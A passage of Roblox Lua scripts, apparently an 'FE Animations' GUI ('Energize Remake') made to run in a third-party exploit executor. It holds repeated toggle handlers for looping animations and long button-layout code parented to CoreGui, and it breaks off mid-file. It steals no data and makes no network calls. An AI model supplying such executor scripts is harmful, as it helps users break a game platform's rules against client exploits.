Swordswing.BackgroundColor3 = c 591 | end) 592 | Swordswing.MouseButton1Click:connect(function() 593 | Swordswingactive = not Swordswingactive 594 | if Swordswingactive then 595 | Swordswing.BackgroundColor3 = l 596 | while wait() do 597 | if track.IsPlaying == false then 598 | if Swordswingactive then 599 | track:Play(.1, 1, 1) 600 | end 601 | end 602 | end 603 | else 604 | track:Stop() 605 | Swordswing.BackgroundColor3 = c 606 | end 607 | end) 608 | local Anim = Instance.new("Animation") 609 | Anim.AnimationId = "rbxassetid://846744780" 610 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 611 | local spinsliceactive = false 612 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 613 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 614 | spinsliceactive = false 615 | spinslice.BackgroundColor3 = c 616 | end) 617 | spinslice.MouseButton1Click:connect(function() 618 | spinsliceactive = not spinsliceactive 619 | if spinsliceactive then 620 | spinslice.BackgroundColor3 = l 621 | while wait() do 622 | if track.IsPlaying == false then 623 | if spinsliceactive then 624 | track:Play(.1, 1, 1) 625 | end 626 | end 627 | end 628 | else 629 | track:Stop() 630 | spinslice.BackgroundColor3 = c 631 | end 632 | end) 633 | local Anim = Instance.new("Animation") 634 | Anim.AnimationId = "rbxassetid://1424674606" 635 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 636 | local airarmsactive = false 637 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 638 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 639 | airarmsactive = false 640 | airarms.BackgroundColor3 = c 641 | end) 642 | airarms.MouseButton1Click:connect(function() 643 | airarmsactive = not airarmsactive 644 | if airarmsactive then 645 | airarms.BackgroundColor3 = l 646 | while wait() do 647 | if track.IsPlaying == false then 648 | if airarmsactive then 649 | track:Play(.1, 1, 1) 650 | end 651 | end 652 | end 653 | else 654 | track:Stop() 655 | airarms.BackgroundColor3 = c 656 | end 657 | end) 658 | local Anim = Instance.new("Animation") 659 | Anim.AnimationId = "rbxassetid://1296868982" 660 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 661 | local detacharmsactive = false 662 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 663 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 664 | detacharmsactive = false 665 | detacharms.BackgroundColor3 = c 666 | end) 667 | detacharms.MouseButton1Click:connect(function() 668 | detacharmsactive = not detacharmsactive 669 | if detacharmsactive then 670 | detacharms.BackgroundColor3 = l 671 | while wait() do 672 | if track.IsPlaying == false then 673 | if detacharmsactive then 674 | track:Play(.1, 1, 1) 675 | end 676 | end 677 | end 678 | else 679 | track:Stop() 680 | detacharms.BackgroundColor3 = c 681 | end 682 | end) 683 | local Anim = Instance.new("Animation") 684 | Anim.AnimationId = "rbxassetid://1323151362" 685 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 686 | local spearactive = false 687 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 688 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 689 | spearactive = false 690 | spear.BackgroundColor3 = c 691 | end) 692 | spear.MouseButton1Click:connect(function() 693 | spearactive = not spearactive 694 | if spearactive then 695 | spear.BackgroundColor3 = l 696 | while wait() do 697 | if track.IsPlaying == false then 698 | if spearactive then 699 | track:Play(.1, 1, 1) 700 | end 701 | end 702 | end 703 | else 704 | track:Stop() 705 | spear.BackgroundColor3 = c 706 | end 707 | end) 708 | local Anim = Instance.new("Animation") 709 | Anim.AnimationId = "rbxassetid://1149279561" 710 | local track = game.Players.LocalPlayer.Character.Humanoid:LoadAnimation(Anim) 711 | local armshakeactive = false 712 | game.Players.LocalPlayer.CharacterAdded:Connect(function(character) 713 | track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) 714 | armshakeactive = false 715 | armshake.BackgroundColor3 = c 716 | end) 717 | armshake.MouseButton1Click:connect(function() 718 | armshakeactive = not armshakeactive 719 | if armshakeactive then 720 | armshake.BackgroundColor3 = l 721 | while wait() do 722 | if track.IsPlaying == false then 723 | if armshakeactive then 724 | track:Play(.1, 1, 1) 725 | end 726 | end 727 | end 728 | else 729 | track:Stop() 730 | armshake.BackgroundColor3 = c 731 | end 732 | end) 733 | -------------------------------------------------------------------------------- /r6 animations: -------------------------------------------------------------------------------- 1 | local Energize = Instance.new("ScreenGui") 2 | local MainFrame = Instance.new("Frame") 3 | local GuiBottomFrame = Instance.new("Frame") 4 | local Credits = Instance.new("TextLabel") 5 | local GuiTopFrame = Instance.new("Frame") 6 | local CloseGUI = Instance.new("TextButton") 7 | local Title = Instance.new("TextLabel") 8 | local CheckR = Instance.new("TextLabel") 9 | local ScrollingFrame = Instance.new("ScrollingFrame") 10 | local GlitchLevitate = Instance.new("TextButton") 11 | local FullSwing = Instance.new("TextButton") 12 | local MoonDance = Instance.new("TextButton") 13 | local FullPunch = Instance.new("TextButton") 14 | local FloorFaint = Instance.new("TextButton") 15 | local Crouch = Instance.new("TextButton") 16 | local SpinDance = Instance.new("TextButton") 17 | local JumpingJacks = Instance.new("TextButton") 18 | local ArmDetach = Instance.new("TextButton") 19 | local MegaInsane = Instance.new("TextButton") 20 | local WeirdMove = Instance.new("TextButton") 21 | local DinoWalk = Instance.new("TextButton") 22 | local FloorCrawl = Instance.new("TextButton") 23 | local Spinner = Instance.new("TextButton") 24 | local Faint = Instance.new("TextButton") 25 | local Levitate = Instance.new("TextButton") 26 | local LoopHead = Instance.new("TextButton") 27 | local HeadThrow = Instance.new("TextButton") 28 | local CloneIllusion = Instance.new("TextButton") 29 | local Dab = Instance.new("TextButton") 30 | local BarrelRoll = Instance.new("TextButton") 31 | local Insane = Instance.new("TextButton") 32 | local SwordSlam = Instance.new("TextButton") 33 | local MovingDance = Instance.new("TextButton") 34 | local ArmTurbine = Instance.new("TextButton") 35 | local SuperPunch = Instance.new("TextButton") 36 | local Scared = Instance.new("TextButton") 37 | local LoopSlam = Instance.new("TextButton") 38 | local HeroJump = Instance.new("TextButton") 39 | local SpinDance2 = Instance.new("TextButton") 40 | local SwordSlice = Instance.new("TextButton") 41 | local FloatingHead = Instance.new("TextButton") 42 | local InsaneArms = Instance.new("TextButton") 43 | local SuperFaint = Instance.new("TextButton") 44 | local FloatSit = Instance.new("TextButton") 45 | local BowDown = Instance.new("TextButton") 46 | local ScrollingFrameR15 = Instance.new("ScrollingFrame") 47 | local FloatSlash = Instance.new("TextButton") 48 | local ArmsOut = Instance.new("TextButton") 49 | local DownSlash = Instance.new("TextButton") 50 | local R15Spinner = Instance.new("TextButton") 51 | local WeirdZombie = Instance.new("TextButton") 52 | local CrazySlash = Instance.new("TextButton") 53 | local Pull = Instance.new("TextButton") 54 | local Open = Instance.new("TextButton") 55 | local CircleArm = Instance.new("TextButton") 56 | local Bend = Instance.new("TextButton") 57 | local RotateSlash = Instance.new("TextButton") 58 | local FlingArms = Instance.new("TextButton") 59 | local SideFrame = Instance.new("Frame") 60 | local OpenGUI = Instance.new("TextButton") 61 | local SideFrameTitle = Instance.new("TextLabel") 62 | --Properties: 63 | Energize.Name = "Energize" 64 | Energize.Parent = game.CoreGui 65 | Energize.ZIndexBehavior = Enum.ZIndexBehavior.Sibling 66 | 67 | MainFrame.Name = "MainFrame" 68 | MainFrame.Active = true 69 | MainFrame.Draggable = true 70 | MainFrame.Parent = Energize 71 | MainFrame.BackgroundColor3 = Color3.new(0.0313726, 0.0313726, 0.0313726) 72 | MainFrame.BackgroundTransparency = 0.15000000596046 73 | MainFrame.Position = UDim2.new(0.502199888, 0, 0.552243114, 0) 74 | MainFrame.Size = UDim2.new(0, 426, 0, 258) 75 | 76 | GuiBottomFrame.Name = "Gui BottomFrame" 77 | GuiBottomFrame.Parent = MainFrame 78 | GuiBottomFrame.BackgroundColor3 = Color3.new(1, 1, 1) 79 | GuiBottomFrame.BackgroundTransparency = 1 80 | GuiBottomFrame.Position = UDim2.new(0, 0, 0.901309371, 0) 81 | GuiBottomFrame.Size = UDim2.new(0, 426, 0, 25) 82 | 83 | Credits.Name = "Credits" 84 | Credits.Parent = GuiBottomFrame 85 | Credits.BackgroundColor3 = Color3.new(0, 0, 0) 86 | Credits.BackgroundTransparency = 1 87 | Credits.Size = UDim2.new(0, 426, 0, 25) 88 | Credits.Font = Enum.Font.SourceSansSemibold 89 | Credits.Text = "By illremember - FE Animations Gui / Remade by Kipster" 90 | Credits.TextColor3 = Color3.new(1, 1, 1) 91 | Credits.TextSize = 17 92 | 93 | GuiTopFrame.Name = "Gui TopFrame" 94 | GuiTopFrame.Parent = MainFrame 95 | GuiTopFrame.BackgroundColor3 = Color3.new(1, 1, 1) 96 | GuiTopFrame.BackgroundTransparency = 1 97 | GuiTopFrame.Position = UDim2.new(0, 0, -0.00178042857, 0) 98 | GuiTopFrame.Size = UDim2.new(0, 426, 0, 25) 99 | 100 | CloseGUI.Name = "CloseGUI" 101 | CloseGUI.Parent = GuiTopFrame 102 | CloseGUI.BackgroundColor3 = Color3.new(0, 0, 0) 103 | CloseGUI.BackgroundTransparency = 0.15000000596046 104 | CloseGUI.BorderSizePixel = 0 105 | CloseGUI.Position = UDim2.new(0.967136145, 0, 0, 0) 106 | CloseGUI.Size = UDim2.new(0, 15, 0, 15) 107 | CloseGUI.Font = Enum.Font.SourceSansSemibold 108 | CloseGUI.Text = "X" 109 | CloseGUI.TextColor3 = Color3.new(1, 1, 1) 110 | CloseGUI.TextSize = 14 111 | 112 | Title.Name = "Title" 113 | Title.Parent = GuiTopFrame 114 | Title.BackgroundColor3 = Color3.new(1, 1, 1) 115 | Title.BackgroundTransparency = 1 116 | Title.Position = UDim2.new(0.653472185, 0, 0, 0) 117 | Title.Size = UDim2.new(0, 105, 0, 25) 118 | Title.Font = Enum.Font.SourceSansSemibold 119 | Title.Text = "Energize Remake" 120 | Title.TextColor3 = Color3.new(1, 1, 1) 121 | Title.TextSize = 17 122 | 123 | CheckR.Name = "CheckR" 124 | CheckR.Parent = GuiTopFrame 125 | CheckR.BackgroundColor3 = Color3.new(1, 1, 1) 126 | CheckR.BackgroundTransparency = 1 127 | CheckR.Position = UDim2.new(0.0234741792, 0, 0, 0) 128 | CheckR.Size = UDim2.new(0, 194, 0, 24) 129 | CheckR.Font = Enum.Font.SourceSansSemibold 130 | CheckR.Text = "Text" 131 | CheckR.TextColor3 = Color3.new(1, 1, 1) 132 | CheckR.TextSize = 17 133 | CheckR.TextXAlignment = Enum.TextXAlignment.Left 134 | 135 | ScrollingFrame.Parent = MainFrame 136 | ScrollingFrame.BackgroundColor3 = Color3.new(0, 0, 0) 137 | ScrollingFrame.BackgroundTransparency = 0.60000002384186 138 | ScrollingFrame.Position = UDim2.new(0, 0, 0.0951187983, 0) 139 | ScrollingFrame.Size = UDim2.new(0, 426, 0, 207) 140 | ScrollingFrame.CanvasSize = UDim2.new(0, 0, 1.29999995, 0) 141 | ScrollingFrame.ScrollBarThickness = 10 142 | 143 | GlitchLevitate.Name = "GlitchLevitate" 144 | GlitchLevitate.Parent = ScrollingFrame 145 | GlitchLevitate.BackgroundColor3 = Color3.new(0, 0, 0) 146 | GlitchLevitate.BackgroundTransparency = 0.30000001192093 147 | GlitchLevitate.Position = UDim2.new(0.0469483584, 0, 0.0273178034, 0) 148 | GlitchLevitate.Size = UDim2.new(0, 90, 0, 30) 149 | GlitchLevitate.Font = Enum.Font.SourceSansSemibold 150 | GlitchLevitate.Text = "Glitch Levitate" 151 | GlitchLevitate.TextColor3 = Color3.new(1, 1, 1) 152 | GlitchLevitate.TextSize = 15 153 | 154 | FullSwing.Name = "FullSwing" 155 | FullSwing.Parent = ScrollingFrame 156 | FullSwing.BackgroundColor3 = Color3.new(0, 0, 0) 157 | FullSwing.BackgroundTransparency = 0.30000001192093 158 | FullSwing.Position = UDim2.new(0.267605633, 0, 0.0273178034, 0) 159 | FullSwing.Size = UDim2.new(0, 90, 0, 30) 160 | FullSwing.Font = Enum.Font.SourceSansSemibold 161 | FullSwing.Text = "Full Swing" 162 | FullSwing.TextColor3 = Color3.new(1, 1, 1) 163 | FullSwing.TextSize = 15 164 | 165 | MoonDance.Name = "MoonDance" 166 | MoonDance.Parent = ScrollingFrame 167 | MoonDance.BackgroundColor3 = Color3.new(0, 0, 0) 168 | MoonDance.BackgroundTransparency = 0.30000001192093 169 | MoonDance.Position = UDim2.new(0.713614941, 0, 0.0273178034, 0) 170 | MoonDance.Size = UDim2.new(0, 90, 0, 30) 171 | MoonDance.Font = Enum.Font.SourceSansSemibold 172 | MoonDance.Text = "Moon Dance" 173 | MoonDance.TextColor3 = Color3.new(1, 1, 1) 174 | MoonDance.TextSize = 15 175 | 176 | FullPunch.Name = "FullPunch" 177 | FullPunch.Parent = ScrollingFrame 178 | FullPunch.BackgroundColor3 = Color3.new(0, 0, 0) 179 | FullPunch.BackgroundTransparency = 0.30000001192093 180 | FullPunch.Position = UDim2.new(0.492957741, 0, 0.0273178034, 0) 181 | FullPunch.Size = UDim2.new(0, 90, 0, 30) 182 | FullPunch.Font = Enum.Font.SourceSansSemibold 183 | FullPunch.Text = "Full Punch" 184 | FullPunch.TextColor3 = Color3.new(1, 1, 1) 185 | FullPunch.TextSize = 15 186 | 187 | FloorFaint.Name = "FloorFaint" 188 | FloorFaint.Parent = ScrollingFrame 189 | FloorFaint.BackgroundColor3 = Color3.new(0, 0, 0) 190 | FloorFaint.BackgroundTransparency = 0.30000001192093 191 | FloorFaint.Position = UDim2.new(0.0469483584, 0, 0.134652346, 0) 192 | FloorFaint.Size = UDim2.new(0, 90, 0, 30) 193 | FloorFaint.Font = Enum.Font.SourceSansSemibold 194 | FloorFaint.Text = "Floor Faint" 195 | FloorFaint.TextColor3 = Color3.new(1, 1, 1) 196 | FloorFaint.TextSize = 15 197 | 198 | Crouch.Name = "Crouch" 199 | Crouch.Parent = ScrollingFrame 200 | Crouch.BackgroundColor3 = Color3.new(0, 0, 0) 201 | Crouch.BackgroundTransparency = 0.30000001192093 202 | Crouch.Position = UDim2.new(0.267605633, 0, 0.134652346, 0) 203 | Crouch.Size = UDim2.new(0, 90, 0, 30) 204 | Crouch.Font = Enum.Font.SourceSansSemibold 205 | Crouch.Text = "Crouch" 206 | Crouch.TextColor3 = Color3.new(1, 1, 1) 207 | Crouch.TextSize = 15 208 | 209 | SpinDance.Name = "SpinDance" 210 | SpinDance.Parent = ScrollingFrame 211 | SpinDance.BackgroundColor3 = Color3.new(0, 0, 0) 212 | SpinDance.BackgroundTransparency = 0.30000001192093 213 | SpinDance.Position = UDim2.new(0.713614941, 0, 0.134652346, 0) 214 | SpinDance.Size = UDim2.new(0, 90, 0, 30) 215 | SpinDance.Font = Enum.Font.SourceSansSemibold 216 | SpinDance.Text = "Spin Dance" 217 | SpinDance.TextColor3 = Color3.new(1, 1, 1) 218 | SpinDance.TextSize = 15 219 | 220 | JumpingJacks.Name = "JumpingJacks" 221 | JumpingJacks.Parent = ScrollingFrame 222 | JumpingJacks.BackgroundColor3 = Color3.new(0, 0, 0) 223 | JumpingJacks.BackgroundTransparency = 0.30000001192093 224 | JumpingJacks.Position = UDim2.new(0.492957741, 0, 0.134652346, 0) 225 | JumpingJacks.Size = UDim2.new(0, 90, 0, 30) 226 | JumpingJacks.Font = Enum.Font.SourceSansSemibold 227 | JumpingJacks.Text = "Jumping Jacks" 228 | JumpingJacks.TextColor3 = Color3.new(1, 1, 1) 229 | JumpingJacks.TextSize = 15 230 | 231 | ArmDetach.Name = "ArmDetach" 232 | ArmDetach.Parent = ScrollingFrame 233 | ArmDetach.BackgroundColor3 = Color3.new(0, 0, 0) 234 | ArmDetach.BackgroundTransparency = 0.30000001192093 235 | ArmDetach.Position = UDim2.new(0.0469483584, 0, 0.241986871, 0) 236 | ArmDetach.Size = UDim2.new(0, 90, 0, 30) 237 | ArmDetach.Font = Enum.Font.SourceSansSemibold 238 | ArmDetach.Text = "Arm Detach" 239 | ArmDetach.TextColor3 = Color3.new(1, 1, 1) 240 | ArmDetach.TextSize = 15 241 | 242 | MegaInsane.Name = "MegaInsane" 243 | MegaInsane.Parent = ScrollingFrame 244 | MegaInsane.BackgroundColor3 = Color3.new(0, 0, 0) 245 | MegaInsane.BackgroundTransparency = 0.30000001192093 246 | MegaInsane.Position = UDim2.new(0.267605633, 0, 0.241986871, 0) 247 | MegaInsane.Size = UDim2.new(0, 90, 0, 30) 248 | MegaInsane.Font = Enum.Font.SourceSansSemibold 249 | MegaInsane.Text = "Mega Insane" 250 | MegaInsane.TextColor3 = Color3.new(1, 1, 1) 251 | MegaInsane.TextSize = 15 252 | 253 | WeirdMove.Name = "WeirdMove" 254 | WeirdMove.Parent = ScrollingFrame 255 | WeirdMove.BackgroundColor3 = Color3.new(0, 0, 0) 256 | WeirdMove.BackgroundTransparency = 0.30000001192093 257 | WeirdMove.Position = UDim2.new(0.713614941, 0, 0.241986871, 0) 258 | WeirdMove.Size = UDim2.new(0, 90, 0, 30) 259 | WeirdMove.Font = Enum.Font.SourceSansSemibold 260 | WeirdMove.Text = "Weird Move" 261 | WeirdMove.TextColor3 = Color3.new(1, 1, 1) 262 | WeirdMove.TextSize = 15 263 | 264 | DinoWalk.Name = "DinoWalk" 265 | DinoWalk.Parent = ScrollingFrame 266 | DinoWalk.BackgroundColor3 = Color3.new(0, 0, 0) 267 | DinoWalk.BackgroundTransparency = 0.30000001192093 268 | DinoWalk.Position = UDim2.new(0.492957741, 0, 0.241986871, 0) 269 | DinoWalk.Size = UDim2.new(0, 90, 0, 30) 270 | DinoWalk.Font = Enum.Font.SourceSansSemibold 271 | DinoWalk.Text = "Dino Walk" 272 | DinoWalk.TextColor3 = Color3.new(1, 1, 1) 273 | DinoWalk.TextSize = 15 274 | 275 | FloorCrawl.Name = "FloorCrawl" 276 | FloorCrawl.Parent = ScrollingFrame 277 | FloorCrawl.BackgroundColor3 = Color3.new(0, 0, 0) 278 | FloorCrawl.BackgroundTransparency = 0.30000001192093 279 | FloorCrawl.Position = UDim2.new(0.492957741, 0, 0.349321395, 0) 280 | FloorCrawl.Size = UDim2.new(0, 90, 0, 30) 281 | FloorCrawl.Font = Enum.Font.SourceSansSemibold 282 | FloorCrawl.Text = "Floor Crawl" 283 | FloorCrawl.TextColor3 = Color3.new(1, 1, 1) 284 | FloorCrawl.TextSize = 15 285 | 286 | Spinner.Name = "Spinner" 287 | Spinner.Parent = ScrollingFrame 288 | Spinner.BackgroundColor3 = Color3.new(0, 0, 0) 289 | Spinner.BackgroundTransparency = 0.30000001192093 290 | Spinner.Position = UDim2.new(0.267605633, 0, 0.349321395, 0) 291 | Spinner.Size = UDim2.new(0, 90, 0, 30) 292 | Spinner.Font = Enum.Font.SourceSansSemibold 293 | Spinner.Text = "Spinner" 294 | Spinner.TextColor3 = Color3.new(1, 1, 1) 295 | Spinner.TextSize = 15 296 | 297 | Faint.Name = "Faint" 298 | Faint.Parent = ScrollingFrame 299 | Faint.BackgroundColor3 = Color3.new(0, 0, 0) 300 | Faint.BackgroundTransparency = 0.30000001192093 301 | Faint.Position = UDim2.new(0.713614941, 0, 0.349321395, 0) 302 | Faint.Size = UDim2.new(0, 90, 0, 30) 303 | Faint.Font = Enum.Font.SourceSansSemibold 304 | Faint.Text = "Faint" 305 | Faint.TextColor3 = Color3.new(1, 1, 1) 306 | Faint.TextSize = 15 307 | 308 | Levitate.Name = "Levitate" 309 | Levitate.Parent = ScrollingFrame 310 | Levitate.BackgroundColor3 = Color3.new(0, 0, 0) 311 | Levitate.BackgroundTransparency = 0.30000001192093 312 | Levitate.Position = UDim2.new(0.0469483584, 0, 0.349321395, 0) 313 | Levitate.Size = UDim2.new(0, 90, 0, 30) 314 | Levitate.Font = Enum.Font.SourceSansSemibold 315 | Levitate.Text = "Levitate" 316 | Levitate.TextColor3 = Color3.new(1, 1, 1) 317 | Levitate.TextSize = 15 318 | 319 | LoopHead.Name = "LoopHead" 320 | LoopHead.Parent = ScrollingFrame 321 | LoopHead.BackgroundColor3 = Color3.new(0, 0, 0) 322 | LoopHead.BackgroundTransparency = 0.30000001192093 323 | LoopHead.Position = UDim2.new(0.0469483584, 0, 0.456655949, 0) 324 | LoopHead.Size = UDim2.new(0, 90, 0, 30) 325 | LoopHead.Font = Enum.Font.SourceSansSemibold 326 | LoopHead.Text = "Loop Head" 327 | LoopHead.TextColor3 = Color3.new(1, 1, 1) 328 | LoopHead.TextSize = 15 329 | 330 | HeadThrow.Name = "HeadThrow" 331 | HeadThrow.Parent = ScrollingFrame 332 | HeadThrow.BackgroundColor3 = Color3.new(0, 0, 0) 333 | HeadThrow.BackgroundTransparency = 0.30000001192093 334 | HeadThrow.Position = UDim2.new(0.267605633, 0, 0.456655949, 0) 335 | HeadThrow.Size = UDim2.new(0, 90, 0, 30) 336 | HeadThrow.Font = Enum.Font.SourceSansSemibold 337 | HeadThrow.Text = "Head Throw" 338 | HeadThrow.TextColor3 = Color3.new(1, 1, 1) 339 | HeadThrow.TextSize = 15 340 | 341 | CloneIllusion.Name = "CloneIllusion" 342 | CloneIllusion.Parent = ScrollingFrame 343 | CloneIllusion.BackgroundColor3 = Color3.new(0, 0, 0) 344 | CloneIllusion.BackgroundTransparency = 0.30000001192093 345 | CloneIllusion.Position = UDim2.new(0.713614941, 0, 0.456655949, 0) 346 | CloneIllusion.Size = UDim2.new(0, 90, 0, 30) 347 | CloneIllusion.Font = Enum.Font.SourceSansSemibold 348 | CloneIllusion.Text = "Clone Illusion" 349 | CloneIllusion.TextColor3 = Color3.new(1, 1, 1) 350 | CloneIllusion.TextSize = 15 351 | 352 | Dab.Name = "Dab" 353 | Dab.Parent = ScrollingFrame 354 | Dab.BackgroundColor3 = Color3.new(0, 0, 0) 355 | Dab.BackgroundTransparency = 0.30000001192093 356 | Dab.Position = UDim2.new(0.492957741, 0, 0.456655949, 0) 357 | Dab.Size = UDim2.new(0, 90, 0, 30) 358 | Dab.Font = Enum.Font.SourceSansSemibold 359 | Dab.Text = "Dab" 360 | Dab.TextColor3 = Color3.new(1, 1, 1) 361 | Dab.TextSize = 15 362 | 363 | BarrelRoll.Name = "BarrelRoll" 364 | BarrelRoll.Parent = ScrollingFrame 365 | BarrelRoll.BackgroundColor3 = Color3.new(0, 0, 0) 366 | BarrelRoll.BackgroundTransparency = 0.30000001192093 367 | BarrelRoll.Position = UDim2.new(0.492957741, 0, 0.563990533, 0) 368 | BarrelRoll.Size = UDim2.new(0, 90, 0, 30) 369 | BarrelRoll.Font = Enum.Font.SourceSansSemibold 370 | BarrelRoll.Text = "Barrel Roll" 371 | BarrelRoll.TextColor3 = Color3.new(1, 1, 1) 372 | BarrelRoll.TextSize = 15 373 | 374 | Insane.Name = "Insane" 375 | Insane.Parent = ScrollingFrame 376 | Insane.BackgroundColor3 = Color3.new(0, 0, 0) 377 | Insane.BackgroundTransparency = 0.30000001192093 378 | Insane.Position = UDim2.new(0.267605633, 0, 0.563990533, 0) 379 | Insane.Size = UDim2.new(0, 90, 0, 30) 380 | Insane.Font = Enum.Font.SourceSansSemibold 381 | Insane.Text = "Insane" 382 | Insane.TextColor3 = Color3.new(1, 1, 1) 383 | Insane.TextSize = 15 384 | 385 | SwordSlam.Name = "SwordSlam" 386 | SwordSlam.Parent = ScrollingFrame 387 | SwordSlam.BackgroundColor3 = Color3.new(0, 0, 0) 388 | SwordSlam.BackgroundTransparency = 0.30000001192093 389 | SwordSlam.Position = UDim2.new(0.713614941, 0, 0.563990533, 0) 390 | SwordSlam.Size = UDim2.new(0, 90, 0, 30) 391 | SwordSlam.Font = Enum.Font.SourceSansSemibold 392 | SwordSlam.Text = "Sword Slam" 393 | SwordSlam.TextColor3 = Color3.new(1, 1, 1) 394 | SwordSlam.TextSize = 15 395 | 396 | MovingDance.Name = "MovingDance" 397 | MovingDance.Parent = ScrollingFrame 398 | MovingDance.BackgroundColor3 = Color3.new(0, 0, 0) 399 | MovingDance.BackgroundTransparency = 0.30000001192093 400 | MovingDance.Position = UDim2.new(0.0469483584, 0, 0.563990533, 0) 401 | MovingDance.Size = UDim2.new(0, 90, 0, 30) 402 | MovingDance.Font = Enum.Font.SourceSansSemibold 403 | MovingDance.Text = "Moving Dance" 404 | MovingDance.TextColor3 = Color3.new(1, 1, 1) 405 | MovingDance.TextSize = 15 406 | 407 | ArmTurbine.Name = "ArmTurbine" 408 | ArmTurbine.Parent = ScrollingFrame 409 | ArmTurbine.BackgroundColor3 = Color3.new(0, 0, 0) 410 | ArmTurbine.BackgroundTransparency = 0.30000001192093 411 | ArmTurbine.Position = UDim2.new(0.267605633, 0, 0.671325028, 0) 412 | ArmTurbine.Size = UDim2.new(0, 90, 0, 30) 413 | ArmTurbine.Font = Enum.Font.SourceSansSemibold 414 | ArmTurbine.Text = "Arm Turbine" 415 | ArmTurbine.TextColor3 = Color3.new(1, 1, 1) 416 | ArmTurbine.TextSize = 15 417 | 418 | SuperPunch.Name = "SuperPunch" 419 | SuperPunch.Parent = ScrollingFrame 420 | SuperPunch.BackgroundColor3 = Color3.new(0, 0, 0) 421 | SuperPunch.BackgroundTransparency = 0.30000001192093 422 | SuperPunch.Position = UDim2.new(0.0469483584, 0, 0.671325028, 0) 423 | SuperPunch.Size = UDim2.new(0, 90, 0, 30) 424 | SuperPunch.Font = Enum.Font.SourceSansSemibold 425 | SuperPunch.Text = "Super Punch" 426 | SuperPunch.TextColor3 = Color3.new(1, 1, 1) 427 | SuperPunch.TextSize = 15 428 | 429 | Scared.Name = "Scared" 430 | Scared.Parent = ScrollingFrame 431 | Scared.BackgroundColor3 = Color3.new(0, 0, 0) 432 | Scared.BackgroundTransparency = 0.30000001192093 433 | Scared.Position = UDim2.new(0.267605633, 0, 0.778659523, 0) 434 | Scared.Size = UDim2.new(0, 90, 0, 30) 435 | Scared.Font = Enum.Font.SourceSansSemibold 436 | Scared.Text = "Scared" 437 | Scared.TextColor3 = Color3.new(1, 1, 1) 438 | Scared.TextSize = 15 439 | 440 | LoopSlam.Name = "LoopSlam" 441 | LoopSlam.Parent = ScrollingFrame 442 | LoopSlam.BackgroundColor3 = Color3.new(0, 0, 0) 443 | LoopSlam.BackgroundTransparency = 0.30000001192093 444 | LoopSlam.Position = UDim2.new(0.713614941, 0, 0.671325028, 0) 445 | LoopSlam.Size = UDim2.new(0, 90, 0, 30) 446 | LoopSlam.Font = Enum.Font.SourceSansSemibold 447 | LoopSlam.Text = "Loop Slam" 448 | LoopSlam.TextColor3 = Color3.new(1, 1, 1) 449 | LoopSlam.TextSize = 15 450 | 451 | HeroJump.Name = "HeroJump" 452 | HeroJump.Parent = ScrollingFrame 453 | HeroJump.BackgroundColor3 = Color3.new(0, 0, 0) 454 | HeroJump.BackgroundTransparency = 0.30000001192093 455 | HeroJump.Position = UDim2.new(0.0469483584, 0, 0.778659523, 0) 456 | HeroJump.Size = UDim2.new(0, 90, 0, 30) 457 | HeroJump.Font = Enum.Font.SourceSansSemibold 458 | HeroJump.Text = "Hero Jump" 459 | HeroJump.TextColor3 = Color3.new(1, 1, 1) 460 | HeroJump.TextSize = 15 461 | 462 | SpinDance2.Name = "SpinDance2" 463 | SpinDance2.Parent = ScrollingFrame 464 | SpinDance2.BackgroundColor3 = Color3.new(0, 0, 0) 465 | SpinDance2.BackgroundTransparency = 0.30000001192093 466 | SpinDance2.Position = UDim2.new(0.713614941, 0, 0.778659523, 0) 467 | SpinDance2.Size = UDim2.new(0, 90, 0, 30) 468 | SpinDance2.Font = Enum.Font.SourceSansSemibold 469 | SpinDance2.Text = "Spin Dance 2" 470 | SpinDance2.TextColor3 = Color3.new(1, 1, 1) 471 | SpinDance2.TextSize = 15 472 | 473 | SwordSlice.Name = "SwordSlice" 474 | SwordSlice.Parent = ScrollingFrame 475 | SwordSlice.BackgroundColor3 = Color3.new(0, 0, 0) 476 | SwordSlice.BackgroundTransparency = 0.30000001192093 477 | SwordSlice.Position = UDim2.new(0.492957741, 0, 0.671325028, 0) 478 | SwordSlice.Size = UDim2.new(0, 90, 0, 30) 479 | SwordSlice.Font = Enum.Font.SourceSansSemibold 480 | SwordSlice.Text = "Sword Slice" 481 | SwordSlice.TextColor3 = Color3.new(1, 1, 1) 482 | SwordSlice.TextSize = 15 483 | 484 | FloatingHead.Name = "FloatingHead" 485 | FloatingHead.Parent = ScrollingFrame 486 | FloatingHead.BackgroundColor3 = Color3.new(0, 0, 0) 487 | FloatingHead.BackgroundTransparency = 0.30000001192093 488 | FloatingHead.Position = UDim2.new(0.492957741, 0, 0.778659523, 0) 489 | FloatingHead.Size = UDim2.new(0, 90, 0, 30) 490 | FloatingHead.Font = Enum.Font.SourceSansSemibold 491 | FloatingHead.Text = "Floating Head" 492 | FloatingHead.TextColor3 = Color3.new(1, 1, 1) 493 | FloatingHead.TextSize = 15 494 | 495 | InsaneArms.Name = "InsaneArms" 496 | InsaneArms.Parent = ScrollingFrame 497 | InsaneArms.BackgroundColor3 = Color3.new(0, 0, 0) 498 | InsaneArms.BackgroundTransparency = 0.30000001192093 499 | InsaneArms.Position = UDim2.new(0.0469483584, 0, 0.888975561, 0) 500 | InsaneArms.Size = UDim2.new(0, 90, 0, 30) 501 | InsaneArms.Font = Enum.Font.SourceSansSemibold 502 | InsaneArms.Text = "Insane Arms" 503 | InsaneArms.TextColor3 = Color3.new(1, 1, 1) 504 | InsaneArms.TextSize = 15 505 | 506 | SuperFaint.Name = "SuperFaint" 507 | SuperFaint.Parent = ScrollingFrame 508 | SuperFaint.BackgroundColor3 = Color3.new(0, 0, 0) 509 | SuperFaint.BackgroundTransparency = 0.30000001192093 510 | SuperFaint.Position = UDim2.new(0.267605633, 0, 0.888975561, 0) 511 | SuperFaint.Size = UDim2.new(0, 90, 